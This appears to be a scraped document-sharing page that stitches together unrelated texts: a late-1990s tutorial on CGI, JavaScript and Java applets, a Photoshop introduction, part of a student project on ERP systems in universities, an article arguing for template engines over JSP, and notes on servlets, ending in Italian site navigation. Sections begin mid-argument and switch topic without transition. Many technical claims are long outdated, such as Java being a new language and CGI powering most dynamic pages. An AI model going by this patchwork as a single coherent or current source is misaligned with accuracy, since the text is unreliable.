Yuck, this exchanged caused 5 instances of the store script to be executed as well as 5 Perl interpreters if the CGI script was written in Perl. Third, CGI is extremely slow. Every time the client does something, the CGI Script must recreate the entire dialog and execute a new request. Add a new item to a virtual shopping cart - new request. Calculate a running total - new request. Submit an order - yet another request. Each request takes time and since the CGI script must be executed again and everyone must wait for a busy Internet. CGI is ugly. Finally, CGI scripts produce fairly ugly user-interfaces. Basically, CGI is limited to bland HTML-based forms and whatever bells and whistles can be provided by surrounding HTML layout. Thus, no CGI application looks like your swank bootleg copy of Word. This may not seem like a big issue at first, but when you start competing for web hits with multi-million dollar companies, image is indeed everything. CGI simply cannot compare with web based applications that are not limited to HTML. Well, those are some pretty damning flaws. Like I said, many systems administrators would love to see CGI fall off the face of the Earth. Unfortunately for those system administrators, the fact is that CGI has continued to be the workhorse of the web, powering 90% of the dynamic web pages out there. The fact is that CGI, especially CGI/Perl is easy to work with and most non-technically oriented webmasters out there can get their needs filled, and filled right away. However amazingly, brandfantasmagorically wonderful other technologies sound, they are still vaporware as far as the average web developer is concerned. Either the ISP does not provide those technologies, or the learning and development curve is too steep or expensive. And of course for small applications typical of most websites, the big guns of C or C++ are just overkill. CGI, for all its flaws, works, and works pretty darn well if done carefully. "Intranet" developers with massive budgets can yack all they want to about servlets and SQL gateways and Server Side Includes and customized server applications written in Java, but for most "Internet" developers out there, CGI is the only tool available for solving their problems. And with creativity and care, CGI can also be the right tool. Client Side Scripting However, this is not to say that other technologies are not extremely useful. Several technologies have proven to be just as important as CGI for the average Internet developer. These technologies
focus on putting the demands of computation in the hands of the client instead of the server. Thus, things like processing simple requests, maintaining state, and GUI (Graphical Usr Interface) presentation are handled by the web surfer's own computer instead of being handled by some web server hosting a site. Client-side programming is based on the idea that the computer that the client is using to browse the web has quite a bit of CPU power sitting there doing nothing. Meanwhile, web servers are being tasked to death handling hundreds of CGI requests above and beyond their regular duties. Thus, it makes sense to share some of that burden between the client and server by taking some of the processing load off the server and giving it to the client. As it so happens, much of what CGI does, can be handled on the client's side. Typically, the only time the server needs to be involved is when the web application needs to send email or access datafiles. Things like maintaining state, filling out forms, error checking, or performing numeric calculation, on the other hand can be handled by the client's own computer. The web browser need not check back with a CGI script every time the user wants to do something. A "script-enabled" HTML page can carry with it instructions on how to handle certain events. In the following figure, client-side scripting has reduced server load by over 80% for every client accessing the CGI script. And of course, since most of the processing is handled locally, the application as a whole runs 5 times faster.
Obviously, this solves many of the problems posed by CGI. Client-side applications maintain security by keeping server processing to a minimum. They are not restricted by HTTP and the GUI can be as pretty and sleek as any traditional software package out there.
The two most popular languages for client-side scripting are JavaScript (Netscape Navigator) and VBScript (Microsoft's Internet Explorer). Both technologies allow web programmers to encode short program "snippets" into their HTML documents that can be executed by a web browser. JavaScript Made Easy[link has gone dead--ed.] provides several excellent examples of JavaScript in action and Reaz Hoque provides a very straight forward tutorial on JavaScript basics. On the other side of the coin, Microsoft provides a good list of samples for VBScript. Actually, script-enabled HTML pages can be fairly dynamic and do indeed cut down on the work of the sever. Of course, in any real application, there will need to be a CGI script on the server to email results or access data, but much of the work, perhaps 75% of it, is done by the client. This can cut down server load by 80% on complex applications. Unfortunately, script-enabled HTML pages have their problems too. The most obvious problem, of course, is that the web browser program must be able to interpret the language used for scripting. And since Netscape and Microsoft are too knuckleheaded to build upon common standards, we are left in the cold. JavaScript programs continually break when viewed using Internet Explorer and VBScripts do the same when viewed with Netscape. Thus, client-side scripting has remained primarily useful only for limited, controlled intranets where webmasters can be sure that all users are using the same browser software to view web pages. Further, both JavaScript and VBScript are only limited languages meant for quick jobs with little complexity. Ticker tape animations and sub totaling are one thing, but a true web application requires a bit more umph. Platform Independent Client-Side Applications with Java That very umph comes with Java. Java was originally developed at Sun Microsystems in 1991 to provide a platform-independent programming language and operating system for consumer electronics (TV sets, toasters and VCRs). In syntax and execution, Java is a lot like a simplified version of C++. ("simplified" should be read in the previous sentence as "an improved"). It is a highly robust, distributed, high performance, objectoriented, multi-threaded language with all of the usual features. As such, it builds upon years of C++ development, taking the good and dispensing with the bad. As it so happened however, Java did not make it into the consumer electronics market. Instead it wound up in our web browsers. Java seemed to be a perfect fit for the web. The language itself was extremely small (as it was built to go inside toasters and alarm clocks with tiny amounts of memory). Thus it could quickly be transferred over the web. Further, Java was platform independent. That is, any computer with a Java virtual machine can run a Java program. Programs can be written anywhere and be run anywhere. This is crucial because, as we saw in the case of the client-side scripting languages, if a language can not run on any machine, it cannot be used on the web that must service every machine, language, and environment imaginable. Platform independence works because Java is an interpreted rather than a compiled language. Unlike C or C++ code, when Java is compiled, it is not compiled into platform specific machine code, but into platform independent byte code. This byte code is distributed over the web and interpreted by a virtual machine (typically built right into a web browser these days) on whichever platform it is being run. Perhaps a picture would be useful...
Thus, as a programmer, you need only concern yourself with the generic Java programming language and compile your applications into bytecode on whatever system you are using. You can then be assured that your bytecode will be executed correctly whether your clients are using Macs, Pcs, Unix boxes or anything else. Java, of course, demands books worth of explanation and description. So, of course, we will not delve too deeply into the language here. Instead, I recommend that you browse through the resources collected at Gamelan which is the be all and end all of Java resource sites. There you can sample several Java programs yourself and see how amazing Java really is. Did I say amazing? Well, Java is certainly a great addition to every web developers tool box, but as you might have expected, Java has as many drawbacks as any of the other tools we've discussed already.
Java Sucks Though Java can create interfaces that go way beyond the capability of HTML, CGI, and JavaScript. And though the language is extremely powerful and portable, Java still has serious restrictions. Of particular concern are the security restrictions built into Java such as the fact that Java programs (Java applet specifically) cannot easily write files to the local harddrive or get data from servers other than the ones they came from. While this may make the public more confident about the language (an important thing and perhaps worth the limitations it causes), it makes Java programs fairly useless for the average developer who absolutely needs such capabilities to create full featured applications. Further, Java programs with a lot of logic take longer to download. If you went to the Gamelan site linked above and tried to run some example Java apps, you certainly found that you had to wait quite a bit for them to download. Similarly, because the programs run on the client's machine, they do not have access to resources on the server. Thus, a Java program cannot even query simple flat-file databases located remotely without a proxy (some other program working as a helper on the server). Finally, Java is still a new language. As such, it is plagued by all the bugs, inconsistency and incompatibilities that any new language is faced with. Though Java boasts platform independence, in reality, programs run differently from platform to platform...if they work at all. Further, though programs might be platform independent, they are not browser independent. Each browser, in fact each operating system, has its own buggy virtual machine that produces different output for the same program. Thus, when you distribute a Java program, you can never be sure exactly how it will run, or if it will be run at all. Though the restrictions of Java are being addressed slowly, the picture looks bleak in the short term (next couple of years) for the Internet developer. Although, code signatures, and other security fixes are arriving, they will still cause complications for the average web developer with regards to centrally storing information and trusting it. Security will be a continuing thorn in our sides. But even still, if all of the well-publicized inconveniences of Java were solved tomorrow, there would still be issues preventing the average web developer from writing all their web apps with Java. For example, not everyone has a database to program against or can afford the cost of JDBC (Java database connectivity) proxy servers. In fact, it is safe to say that "most" web developers do not have those tools to work with. Typically, Internet Service Providers do not allow customers to run servers of any kind through their account, let alone complicated database servers. Thus, in order to perform database management functions essential to many applications, the average web developer will still need to work with flat files on the server hardware...and this means CGI. There are also issues preventing the spoiled "intranet" developer from using Java as well. For example, the JDBC standard will not necessarily help in a corporate environment in which some sort of proxy to a real database server may still be needed that can communicate across a firewall with a web server. Not only will Java be blocked by a firewall, but it cannot use standard encryption standards to provide secure, encrypted transactions. In short, though Java is a profound addition to our toolbox, it is not the answer to all our woes. Conclusion: Stocking your Toolbox As any good technician knows, there is no such thing as a "best" tool. The best tool is dependent on a whole host of factors from the type of task at hand to the personality of the marketing director. The best tool is a fantasy. Instead, every web developer should have at her disposal a wide array of tools to solve problems. Sometimes a server-side solution will be appropriate, other times a client-side solution will be best.
Your main goal as a web developer is to develop an intuition about when to use which. That said, I would like to suggest one combination of tools that I see as becoming extremely important for all web developers. The combination is that of CGI and Java. Consider the following Problems and Solutions... Problem: The average "Internet" web developer has probably already picked up Perl/CGI programming. Most have not picked up Java with the exception of being able to code GUI interfaces using various visual tools such as Symantec's Visual Cafe or Microsoft J++. Solution: A Java to CGI interface leverages existing Perl/CGI knowledge so that the core program logic can be located on a server while merely having to code a thin (very small and easily downloaded) GUI Java client. In addition, a developer experienced in Perl will be able to whip out 80% of their program in a short period of time using a language like Perl while leaving a mere 20% (The GUI) left to Java (A hard language for most people). Problem: Internet developers who do work for sites on a virtual web server or an ISP typically cannot use Sybase, Oracle, or another commercial database to store data via JDBC. Frequently, the ONLY option that these developers or consultants have is to do flat-file processing using CGI/PERL that generally has precluded the use of Java. Solution: A Java to CGI interface will allow applets to be created that can use flat-file databases that an average small-business can afford (free). Problem: Developers who have already invested a lot of time creating CGI/PERL for their site do not want to rewrite all their applications in Java. Solution: A Java to CGI interface will allow existing applications to be leveraged by allowing a developer to create a Java applet on top of an existing CGI script with minor modifications to make the CGI output data conducive to interpretation by the Java applet As you can see, the benefits and flaws of Java and CGI compliment each other very well. Using Java frontends and CGI backends presents an excellent opportunity for web developers on the Internet to create fully featured applications with the available resources. I would recommend that every web developer make sure to study up on the interaction of Java and CGI to be prepared for the contracts that will come forward over the next few years. Footnotes The Web Developer's Resource Library has an excellent HTML Primer if you need a refresher on what HTML is! But basically, HTML (Hyper Text Markup Language) is a way of describing how a web browser should display text and images. HTML codifies page layout into a series of instructions called "HTML tags". The job of Web Browser programs is to translate ugly HTML instructions into the beautiful web pages we see while surfing. Okay so there are quite a few jargon words in that sentence which might need quick explanations.
In this column we will use the word "client" to refer to a person who is using a "web browser" program like Netscape Navigator or Internet Explorer to display HTML documents received from a "web server". A web server is a combination of hardware (an actual computer that stores all of the HTML files) and software (the program that listens for web browser requests and utilizes the hardware resources to fulfill those requests). Web browsers and web servers communicate using HTTP (Hyper Text Transfer Protocol) which
provides a communication standard for efficient and intelligible dialog. Essentially HTTP allows a web browser to contact a web server somewhere on the web and ask for a specific document (or resource). It also allows the server to send the requested document (or execute the resource) back to the web browser. Truthfully much of what is done by CGI can also be done using SSI (Server Side Includes) which is a service provided by web server software in which certain HTML comment tags can be used to execute commands. SSI will not be covered this month since it demands its own article, however, for the purposes of this introduction, SSI programs are similar enough in theory to CGI programs that they can be thought of as the same thing. When you get some software for your computer and you have to get the special "Mac Version" or "Windows Version", you are getting a "platform dependent" program. Unfortunately, when you move from being a PC user to being a Mac user, you have to buy all new programs because the programs you bought for Windows will not work on Mac. The beauty of web programs is that they are typically "platform independent" which means that you can run them anywhere. Whether you use a PC, Mac or Unix box, the programs will work just fine. CGI is not the only form of server-side scripting available, of course. For example, Netscape's Live Wire is an online development environment for Web site management and client-server application development. It uses JavaScript, Netscape's scripting language, to create server-based applications similar to CGI programs. Unlike CGI programs, however, LiveWire applications are closely integrated with the HTML pages that control them. However, non-CGI server side strategies are best covered in their own article. You can think of an instance of a script as a unique and independent version of a generic script. It is called an "instance" because ten web surfers could all execute a CGI script at the same time. Though each web surfer would be using the same generic CGI script, each instance of that script would be personalized to that web surfer. Thus you may have ten instances of the exact same script running in parallel on the web server hardware. Hidden variables allow you to maintain state using the HTML "Hidden" form tag. Essentially, you include information in your HTML form that will not be visible to the user when they look at the form in their web browser window, but which will be transferred to the CGI script with the user-supplied data. The format of the tag looks something like the following: <INPUT TYPE = "HIDDEN" NAME = "first_name" VALUE = "selena"> <INPUT TYPE = "HIDDEN" NAME = "last_name" VALUE = "sol"> When the CGI script processes the information that the user enters into the HTML form, it will also receive the variable "first_name" with the value of "selena" as well as "last_name" equal to "sol". If the user is not using a FORM tag to navigate through a site, the admin can still encode state information in the URL by using the HTTP standard for URL encoding. For example, the following hyperlink would send the same info as above to the CGI script. <A HREF = "www.extropia.com/test.cgi?first_name=selena&last_name=sol">click here</A> Notice that variables to be passed along are listed after the question mark, name/value pairs are separated by the ampersand sign, and the variable name and variable values are separated by an equal sign. Finally, the CGI script may write out state information to a file on the server and then simply pass along the location of the file using one or both of the above methods. This is best when there is a large amount of state information. By the way, maintaining state can also be achieved using Netscape Cookies, however, we will not address cookies here because they require their own article. Perl is a fun language to use because it keeps the nuts and bolts of machine code as invisible as possible. One of the ways Perl does this is by adding an extra step between you and the computer. This extra step is called a "Perl interpreter". This interpreter (which your sysadmin must install) reads a Perl program that you write and translates it "on the fly" into machine code that can be understood by your computer. Your "executable" can then be moved to any other system with a Perl interpreter
and be run without problems. Further, the code can be easily modified and understood. Unfortunately, in order to run your executable, you must also run the interpreter and this can be expensive in terms of server resources. In more intense languages like C or C++, there is no interpreter. You must use a special "compiler" program to translate your code into machine code. This affords greater power to your programs since you do not need to run a separate interpreter when you run your executable, but it does mean that executables are specific to each operating system and that the source code is stored separately from the executable code.
Notice that CGI scripts must be smart enough to answer all sorts of questions.
About Photoshop:
Introducton to Adobe Photoshop

What is Photoshop Previous | Next | Table of Contents Adobe Photoshop is hands down, the most popular program for creating and modifying images for the web. This is true not only because Photoshop is available on a wide array of platforms ranging from Mac to Windows to UNIX, but because after four generations of development, Adobe Photoshop has the most intuitive user interface, the most complete set of tools, and the largest number of reference books around. In fact, as Deke McClelland says in Photoshop 3 Bible, "Some estimates say that Photoshop sales exceed those of all of its competitors combined."
Photoshop is only one tool in a good designer's arsenal. Other popular tools include Paint Shop Pro, DeBabelizer, or LView Pro for Windows and GIF Converter or Graphics Converter for Macintosh. Fractal Design, Aldus and HSC also put out some excellent programs
Kenji Tachibana (a gifted freelance graphics artist) and I decided to focus on Photoshop primarily because Photoshop is the program that most web designers use. However, since most programs these days use similar concepts, many of the things we talk about here will be directly relevant to any other graphics program on the market. Photoshop Requirements One thing to keep in mind about using Photoshop however, is that since Photoshop is so powerful, it requires a fairly souped up working environment. Specifically, it would be a good idea to have at least 32MB of RAM. After all, as a web designer, you
will be tasking your system while developing. Often you will have two browsers, Photoshop, an HTML editor, a word processor, and two or three ftp/telnet sessions open all at one time. Without enough resources, your computer will not have enough gusto to keep up with you Another downside to Photoshop is that it can be rather expensive to get the latest and greatest version. However, this tutorial is written with this in mind. We have limited our discussion mainly to 3.0 basics (which still apply for 4.0 users). These basics represent the foundation of your skills with Photoshop regardless of the version. Thus, after reading through this tutorial, you will have what you need to make stunning web graphics by investing in a 1/4 price year old version of Photoshop. Eventually, of course, you will want to upgrade.
Literature Review
Articles (online, white paper, journals)
Since the project is being implemented in the universities and due to the insufficient books available on it, always a reasonable amount of reading online articles, journals, and white papers which are related to the project has been done through understanding and analyzing the contents of these articles. Since its an initial research into ERP and its clients it is much evident enough to see whether the major players were using the same package for their businesses. According to the analysis a lot of case studies have been done on the universities from USA and with one or two being from Asia and Europe. This being the case the project has been concentrated from the American approach and being applied to European model of education. When going through the case studies two different views were presented by the authors saying like ERP does work for universities and others saying it do not work for a university.
By considering these two different views a decision was led that ERP is being implemented by the universities which have extra liquid assets only. Personal Observation A personal observation was carried out a Sheffield Hallam University. Here the university uses two different systems for its admissions and finance department in which both the departments have to be in contact with a real-time system in place to see the both the progress of an application from the finance and the admissions point of view instead of asking the student to contact each department for the same work Questionnaire Universities will be contacted through emails, a set of questionnaire will be sent to get a response for the mails sent.
Direct Contact On contacting the Learning and IT services department at Sheffield Hallam University reasonable and valuable information was provided regarding the enterprise systems which is being implemented and used at the university. By having this information it helps the research work from distinguishing between the functions and the decisions carried out.
3.4 Limitations in Research The project work did have its roadblocks which mainly related to the fieldwork at which the technology was being considered. Since the technology has been in existence for a quite a
while as already stated; the technology was being innovated for the Universities of 21st century.
The availability of books was quite adequate but was limited on the technical front; the books emphasized much on technical aspects but with little information on where it can be applied. A list of books which have been referred for have been included in the bibliography section of this project work. When the project work was started quite a few articles were available at the beginning. A few articles relating to other fields other than university have been studied to gain an understanding how it has fared with them and can these articles be useful in the study for this work, to state a little information has been useful and with majority stating the benefits and expected financial outcomes of their company.
The case studies which are being considered for the analysis were mainly centered on the American model of education which was tailor made for the American Education System. A relatively few case studies were in existence with respect to the British Universities at the start of the project.
When direct contact was established at Sheffield Hallam University valuable information regarding what kind of enterprise systems that university might employ to carry their functions was useful. Personal contact through email was established to contact the relevant departments of the university which have already implemented in them the ERP technology, but no response was
received. This may be the timing at which the emails were sent out, and me be due to present preoccupations of the university.
The Problem with Straight-up Servlets In the beginning, servlets were invented, and the world saw that they were good. Dynamic web pages based on servlets executed quickly, could be moved between servers easily, and integrated well with back-end data sources. Servlets became widely accepted as a premiere platform for server-side web development. However, the commonly-used simple approach to generating HTML content, having the programer write anout.println() call per HTML line, became a serious problem for real servlet use. HTML content had to be created within code, an onerous and time consuming task for long HTML pages. In addition, content creators had to ask developers to make all content changes. People searched for a better way. Along Comes JSP Around this time JSP 0.90 came along. With this new technology you could put snippets of Java code inside your HTML, and the server would automatically create a servlet from the page. This helped quite a lot. There was no attempt to hide the Servlet API; JSP was considered a "cheap" way for a Java programmer to write a servlet. All the HTML code could be included directly without out.println() calls and page creators could make changes to the HTML without serious risk of breaking the Java code. But having artists and developers working on the same file wasn't ideal, and having Java inside HTML proved almost as awkward as having HTML inside Java. It could easily create a hard to read mess. So people matured in their use of JSP and started to rely more on JavaBeans. Beans were written to contain business logic code needed by the JSP page. Much of the code inside the JSP page could be moved out of the page into the bean with only minimal hooks left behind where the page would access the bean. More recently, people have started to note that JSP pages used this way are really a "view". They're a component used to display the results of a client request. So people thought, Why submit a request directly to a "view"? What if the targetted "view" isn't the proper view for that request? After all, many requests have several possible resulting views. For example, the same request might generate a success page, a database exception error report, or a required parameter missing error report. The same request might also generate a page in English or a page in Spanish, depending on the client's locale. Why must a client directly submit its request to a view? Shouldn't the client make a request to some general server component and let the server determine the JSP view to return?
This belief caused many people to adopt what has been called the "Model 2" design, named after an architecture laid out in the JSP 0.92 specification and based on the model-viewcontroller pattern. With this design, requests are submitted to a servlet "controller" that performs business logic and generates an appropriate data "model" to be displayed. This data is then passed internally to a JSP page "view" for rendering, where it appears to the JSP page like a normal embedded JavaBean. The appropriate JSP page can be selected to do the display, depending on the logic inside the controlling servlet. The JSP page becomes a nice template view. This was another improvement -- and where many serious developers stand today. Enter Template Engines But why suffer the complexity of JSP just to do templating? Might it not be better to use a dedicated template engine? By using a template engine intended for this exact use instead of the general-purpose JSP, the underlying design can be cleaner, the syntax clearer, the error messages more meaningful, and the tool more customizable. Several companies have built such engines, the most popular probably being WebMacro (http://webmacro.org, from Semiotek) whose engine is free. Using a dedicated template engine instead of JSP offers several technical advantages that developers should be aware of: Problem #1: Java Code Too Tempting JSP makes it tempting to put Java code in the web page, even though that's considered bad design. Just as Java improves on C++ by removing the ability to use global variables and multiple inheritance, so do template engines improve on JSP by removing the ability to put raw code in the page. Template engines enforce good design. Problem #2: Java Code Required Doing mundane things in JSP can actually demand putting Java code in the page. For example, assume the page needs to determine the context root of the current web application to create a link to the web app home page: In JSP this is best done using Java code: <a href="<%= request.getContextPath() %>/index.html">Home page</a> You can try to avoid Java code using the <jsp:getProperty> tag but that leaves you with the following hard-to-read string: <a href="<jsp:getProperty name="request" property="contextPath"/>/index.html">HomePage</a> Using a template engine there's no Java code and no ugly syntax. Here's the same command written in WebMacro: <a href="$Request.ContextPath;/index.html">Home page</a>
In WebMacro, ContextPath is seen as a property of the $Request variable, accessed using a Perl-like syntax. Other template engines use other syntax styles. An another example where JSP requires Java code in the page, assume an advanced "view" needs to set a cookie to record the user's default color scheme -- a task that presumably should be done by the view and not the servlet controller. In JSP it requires Java code: <% Cookie c = new Cookie("colorscheme", "blue"); response.addCookie(c); %> In WebMacro there's no Java code: #set $Cookie.colorscheme = "blue" As a last example, assume it's time to retrieve the color scheme cookie. For the benefit of JSP, we can presume also there's a utility class available to help since doing this raw with getCookies() is ridiculously difficult. In JSP: <% String colorscheme = ServletUtils.getCookie(request, "colorscheme"); %> In WebMacro there's no need for a utility class and it's always: $Cookie.colorscheme.Value For graphics artists writing JSP pages, which syntax would be simpler to learn? JSP 1.1 introduced custom tags (allowing arbitrary HTML-like tags to appear in JSP pages executing Java code on the backend) which may help with tasks like this, assuming there becomes a widely known, fully featured, freely available, standardized tag library. So far that has yet to occur. Problem #3: Simple Tasks are Hard Doing even a simple task such as header and footer includes is overly difficult with JSP. Assume there's a "header" template and a "footer" template to be included on all pages, and each template includes in its content the current page title. In JSP the best way to do this is as follows: <% String title = "The Page Title"; %> <%@ include file="/header.jsp" %> Your content here <%@ include file="/footer.jsp" %> Page creators must not forget the semi-colon in the first line and must make sure to declare title as a Java String. Plus, the /header.jsp and /footer.jsp must be made publicly accessible somewhere under the document root even though they aren't full pages themselves. In WebMacro including headers and footers is done easily: #set $title = "The Page Title" #parse "header.wm"
Your content here #parse "footer.wm" There are no semi-colons or String types for designers to remember, and the .wm files are found in a customizable search path, not under the document root. Problem #4: Lousy Looping Looping is overly difficult in JSP. Here's the JSP code to iterate over a vector of ISP objects printing the name of each. <% Enumeration e = list.elements(); while (e.hasMoreElements()) { out.print("The next name is "); out.println(((ISP)e.nextElement()).getName()); out.print("<br>"); } %> Someday there will be custom tags for doing these loops. And custom tags for "if" checks too. And JSP pages may look like a grotesque Java reimplemented with tags. But meanwhile, the webmacro loop is already quite nice: #foreach $isp in $isps { The next name is $isp.Name <br> } The #foreach directive could be replaced by a custom #foreach-backwards directive fairly easily as well if such a thing were necessary. Will custom tags really solve this problem? Probably not. Here's a possible <foreach> tag. <foreach item="isp" list="isps"> The next name is <jsp:getProperty name="isp" property="name"/> <br> </foreach> Which would a graphics artist prefer? Problem #5: Useless Error Messages JSP page syntax errors can cause surprisingly odd and useless error messages. This is due to the fact the page is transformed into a servlet and then compiled. Good JSP tools can help narrow down errors to likely syntax error locations, but even the best of tools will probably have problems making all error messages meaningful. Some errors will just be impossible for tools to diagnose, due to the transformation. For example, assume a JSP page needs to set a title common across all pages. What's wrong with the following? <% static String title = "Global title"; %> Well, the Tomcat reference implementation for JSP says this is wrong: work/%3A8080%2F/JC_0002ejspJC_jsp_1.java:70: Statement expected. static int count = 0; ^
This cryptic error is trying to say that scriptlets like the above are placed inside the _jspService() method and static variables aren't allowed inside methods. The syntax should be <%! %>. Page designers won't recognize this error, and programmers likely won't either without looking at the generated source. Even the best tools probably won't be much help with errors such as these. Assuming all the Java code could be moved out of the page, that still doesn't solve this problem. What's wrong with this expression that prints the value of count? <% count %> The Tomcat engine says: work/8080/_0002ftest_0002ejsptest_jsp_0.java:56: Class count not found in type declaration. count ^ work/8080/_0002ftest_0002ejsptest_jsp_0.java:59: Invalid declaration. out.write("\r\n"); ^ In other words, there's an equal sign missing. It should be <%= count %>. Because a template engine can operate directly on the template file without any "magical" translation to code, it's far easier to properly report errors. To use an analogy: When commands are typed into a command line Unix shell written in C, you don't want the shell to create a C program to execute the command. You want the shell to simply interpret the command and behave accordingly, with direct error messages when necessary. Problem #6: Need a Compiler JSP requires a compiler be shipped with the webserver. That's problematic, especially since Sun doesn't give away the tools.jar library containing their javac compiler. Web servers can package an outside vendor's compiler such as IBM's jikes; however such compilers generally don't work on all platforms and (being written in C++) aren't much help to a pure-Java web server. JSP has a pre-compile option that can help some here, although that's a less than elegant solution. Problem #7: Wasted Space JSP consumes extra hard drive space and extra memory space. For every 30K JSP file on the server there must be a corresponding larger-than-30K class file created. This essentially doubles the hard drive requirements to store JSP pages. Considering how easily a JSP file can <%@ include> a large data file for display, this becomes a real concern. Also, each JSP's class file data must be loaded into the server's memory, meaning the server may eventually store the entire JSP document tree in memory. A few JVMs have the ability to remove class file data from memory; however, the programmer generally has no control over the rules for reclaiming and for large sites the reclaiming probably won't be aggressive enough. With template engines there's no need to duplicate the page data into a second file, so hard drive space is spared. Template engines also give the programmer full control over how templates are cached in memory. There are also some downsides to using a template engine:
Template Problem #1: No Specification No specification exists for how a template engine should behave. However, it's interesting to note that this is far less important than with JSP because, unlike JSP, template engines demand nothing special of the web server -- any server supporting servlets supports template engines (including API 2.0 servers like Apache/JServ which can't fully support JSP)! Healthy competition for the best template engine design could actually spark innovation, especially assuming open source implementations that can leverage each other's ideas and code. As it stands now, WebMacro exists like Perl, a tool where the open source implementation is the specification. Template Problem #2: Not Widely Known Template engines aren't widely known. JSP has had a tremendous amount of marketing and has gained terrific mind share. Using template engines is a relatively unknown alternative technique. Template Problem #3: Not Yet Tuned Template engines have yet to be highly tuned. No performance numbers have been taken comparing template engine and JSP performance. Theoretically a well tuned implementations of a template engine should match a tuned implementation of JSP; however in the world today, considering the effort third party vendors have given to JSP so far, the odds are good that JSP implementations are better tuned.
The Java web server is Java Soft's own web Server. The Java web server is just a part of a larger framework, intended to provide you not just with a web server, but also with tools. To build customized network servers for any Internet or Intranet client/server system. Servlets are to a web server, how applets are to the browser.
A client can invoke Servlets in the following ways:

The client can request for a document that is served by the Servlet. The client (browser) can invoke the Servlet directly using a URL, once it has been
mapped using the Servlet Aliases section of the admin GUI.

The Servlet can be invoked through server side include tags. The Servlet can be invoked by placing it in the Servlets/ directory.
The Servlet can be invoked by using it in a filter chain.

Back

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Back

Caricato da

Copyright:

Formati disponibili

Access Models: A Java Server Pages file may be accessed in at least two different ways.

DESIGN PATTERN Data Access Object

Participants and Responsibilities

JSP Engine & Web server

Create and check your log files regularly.

Introduction to Web Programming:

Let's look at the CGI processes in the following chart.

Introducton to Adobe Photoshop

Articles (online, white paper, journals)

A client can invoke Servlets in the following ways:

mapped using the Servlet Aliases section of the admin GUI.

The Servlet can be invoked by using it in a filter chain.

Potrebbero piacerti anche